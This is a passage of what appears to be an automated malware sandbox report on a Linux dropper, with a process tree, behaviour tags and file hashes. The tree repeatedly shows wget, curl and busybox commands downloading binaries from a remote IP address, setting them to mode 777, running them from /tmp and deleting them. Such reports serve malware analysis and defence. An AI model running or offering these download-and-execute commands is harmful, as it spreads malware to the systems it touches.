/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:966
-
-
/bin/chmodchmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:972
-
-
/bin/chmodchmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:978
-
-
/bin/chmodchmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:981
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:982
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:984
-
-
/bin/chmodchmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:987
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:988
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:989
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:990
-
-
/bin/chmodchmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- File and Directory Permissions Modification
PID:991
-
-
/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Executes dropped EXE
PID:992
-
-
/bin/rmrm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:993
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:994
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:995
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:996
-
-
/bin/chmodchmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:999
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:1000
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:1002
-
-
/bin/chmodchmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- File and Directory Permissions Modification
PID:1003
-
-
/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Executes dropped EXE
PID:1004
-
-
/bin/rmrm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:1005
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97